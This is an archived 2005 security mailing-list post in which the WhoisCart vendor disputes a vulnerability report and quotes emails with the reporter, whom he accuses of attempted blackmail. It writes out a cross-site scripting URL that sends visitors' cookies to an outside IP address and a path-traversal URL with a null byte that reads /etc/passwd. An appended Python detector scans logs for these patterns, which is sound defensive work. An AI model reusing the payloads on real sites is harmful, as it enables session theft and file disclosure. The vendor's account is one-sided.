Message-ID: <00d401c5838f$b969d550$0500a8c0@ONE>
Date: Fri Jul 8 08:35:05 2005
From: saeven at saeven.net (S. Alexandre M. Lemaire)
Subject: Multiple Vulnerabilities in Saeven.net's WhoisCart software.
It's unfortunate that a community whose posts are meant to be useful becomes littered with individuals who resort to abasement and personal insults. It's convenient, however, that only the last few bits of a conversation between myself and Elzar (aka Vic Fryzel) figure as the basis and closing statement of the vulnerability report to which this reply is intended:
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034690.html
To clarify the situation, since we're on open grounds here, I'll post the pertinent emails. This is what I get in my inbox at the end of a normal day:
Email #1
_______
Hello.
My name is Vic Fryzel, and I am a private security consultant. Recently, I have found a major vulnerability in your WhoisCart software that allows for unauthorized client and administrative logins. I'm mailing in hopes of privately disclosing this vulnerability to you. My services come with a fee of $500 USD per vulnerability, with half of that fee paid up front, and the other half paid upon delivery of the vulnerability. Delivery of the vulnerability will come in a detailed report, stating how to reproduce the vulnerability, why the vulnerability occurs, and how to fix the vulnerability. The second half of the payment should come upon your successful reproduction of the vulnerability, which in this case should not be at all hard.
Thank you for your time.
Warm regards,
Vic Fryzel
vic@...llsage.com
Response #1 (from myself)
____________________
This message is definitely difficult to digest as its contents come unfounded. Unfortunately we cannot honor it as is, since you provide no basis, or proof, for what you suggest. Further, the grounds on which you present this opportunistic proposal are legally unsound; whilst not interested in pursuing legalities, however, I'll extend you a chance to first prove your claim without initially disclosing the substance of what you suggest. If proven, we can discuss a contractual agreement, where we could also discuss your fee for the consultancy, and viability of contract. Signed and agreed, we'll gladly exchange your fee for the solution to the problem you suggest exists.
I've installed a whois.cart for you at:
(url removed)
My request is that you give me the particulars of the first hosting account listed in the hosts section. If you can give me these details within 12 hours, I will gladly entertain your proposal, and continue discussion with you as applicable to your initial proposal, and the aforementioned engagements.
____________________
After this point the dodgy conversations continued after I'd made a test environment fully available to Vic. Vic couldn't make good on his initial claim, and never was able to reveal a single thing. He later admits:
Vic Fryzel aka Elzar Stuffenbach : 6/20/2005 11:05 PM:
"Hey, Ah; I'm pretty sure that last night I was able to duplicate this vulnerability in more places, but I'll take your word for it. Regardless, I was "wrong" in my initial findings. However, I have a new finding, and I don't have SSH access to your test server. I can prove it to you, come up with a test environment for proof."
The falsified claims and unfounded "new vulnerabilities" (new attempts at a quick $500?) continue for another 3-4 emails, something here, there (in a Seussian dizziness) and in closure to a string of resultless attempts Vic attempts anew:
Vic Fryzel aka Elzar Stuffenbach : 6/22/2005 11:05 PM:
"Hey Alexandre, so, I've been able to actually recreate the first vulnerability (javascript), under a different scenario on your test setup. Let me know how you'd like to proceed. Vic"
Still, however, the hosting item in the admin list was never revealed! It was obvious then that Vic couldn't make good on his claim - what credibility is then left? None. Blackmail attempts aren't all that new to any software company. We'll of course dismiss the affair, and thank him for his efforts. Elzar concluded instead with an email which resorted to insults, to which I replied with a message which was only conveniently partially copied in his post here - I'll paste it in its entirety here - seems he left out the part that clearly stated his efforts had failed:
____________________
I'll indulge your comments.
The truth is that I don't maintain the work on whois.cart currently. I have a staff of 13 people working for me right now, the developments are intense and I don't have the time to monitor them as I usually would. They package and operate independently from myself. My user community knows well (as I post frequent updates in the forums) that I'm currently vested into our other project, our helpdesk. We have a user base of 3000+, you aren't the only one to submit bug reports - note also that the people that work for me aren't bored teenagers. They are people with M.Scs and PhDs in computer science and related fields, who've agreed to partake in the whois.cart project on their spare time initially. Your concern for security is not exclusive.
Calling me a liar doesn't change the fact that Sunday's claim, still unfounded, has you upset at me just today for some completely unrelated and absurd reason. Admit that from my point of view, this is absolutely outlandish. More than 48 hours have passed during which you could have substantiated your claim.
I'll leave the testbed running 2.2.80 until Friday as promised. Again, if you can make good on your initial claim, I'll honor it to all ends even though your propositions are increasingly shady, and you've resorted to insults and abasement in the process. We're people of our word, and I'll hold to that - whatever your motives are. Tact goes a longer way though; we generously reward people in our user community that do genuinely find what you had claimed to have found.
____________________
Never a peep past this. What is interesting though, is that instead of posting REAL links to the cart in his report - we get fictitious links - why not try it for yourselves?
http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE
becomes
http://whoiscart.net/demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E
Further, the file-browse fabrication would work like this:
http://whoiscart.net/demo/index.php?language=../../../../../../../../../../../../../etc/passwd%00
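The two request shapes quoted above, as an added detection example that is not part of the original post or of WhoisCart: a Python scan of constructed access-log lines that flags the injected-tag `page` parameter and the traversal-plus-null-byte `language` parameter. The log lines, client addresses, timestamps and sizes are constructed; only the two request targets are the URLs quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Combined-Log-Format lines; the two request targets are the
# URLs quoted in the post, everything else (addresses, times, sizes) is made up.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Jul/2005:08:35:05 +0000] "GET /demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E HTTP/1.1" 200 512
203.0.113.5 - - [08/Jul/2005:08:36:10 +0000] "GET /demo/index.php?language=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1034
198.51.100.7 - - [08/Jul/2005:08:37:00 +0000] "GET /demo/index.php?language=en HTTP/1.1" 200 2048
198.51.100.7 - - [08/Jul/2005:08:38:00 +0000] "GET /demo/profile.php?page=account HTTP/1.1" 200 3011
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# (label, predicate over a decoded query-string value)
CHECKS = (
    ("null_byte", lambda v: "\x00" in v),
    ("path_traversal", lambda v: re.search(r"(?:^|[\\/])\.\.(?:[\\/]|$)", v) is not None),
    ("html_tag", lambda v: re.search(r"<\s*/?[a-z!]", v, re.I) is not None),
    ("event_handler", lambda v: re.search(r"\bon[a-z]+\s*=", v, re.I) is not None),
)


def findings_for_value(value):
    """Labels that fire for one value; unquote a second time so a
    double-encoded payload (e.g. %252e%252e%252f) is caught as well."""
    candidates = {value, unquote(value)}
    return sorted({label for label, hit in CHECKS for v in candidates if hit(v)})


def scan_line(line):
    """Return [(script_path, param_name, labels)] for suspicious params in one line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        labels = findings_for_value(value)  # parse_qsl has already decoded once
        if labels:
            hits.append((url.path, name, labels))
    return hits


def scan_log(text):
    """Map 1-based line number -> hits, for flagged lines only."""
    results = {}
    for number, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            results[number] = hits
    return results
```

Running `scan_log(SAMPLE_LOG)` flags only the first two lines; the plain `language=en` and `page=account` requests pass untouched.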
Lastly, as reply to the "Workaround" paragraph, Elzar brings up completely unrelated material into something that has nothing to do with Whois.Cart! What's worse is Vic's own website: no links work, script errors appear left and right - these things are taken into consideration when such a claim is made. In the end, the claim followed his site's suit. Unfounded, and unfinished.
From: Vic Fryzel <vic@...llsage.com>
http://shellsage.com
This said, damage control has it that unfortunately this individual's failed attempt at blackmail has resulted in a rather rapid propagation of these repeated falsifications all over vulnerability and security report sites. If you operate such a site and read this, I would appreciate it if you remove this resource. Do feel free to contact us firsthand, myself personally at [saeven at saeven dot net], if you require any type of tangible testing or proof; I'll gladly give you access to the same test environment that Vic/Elzar was given. All sites that we've contacted in conjunction with their reports based on this email have removed it immediately, aside from Secunia, which has yet to act.
Our product, and foremost our users, are of utmost importance, and we cannot have their peace of mind polluted with someone's retort to a botched blackmail attempt.
Cordially.
Alexandre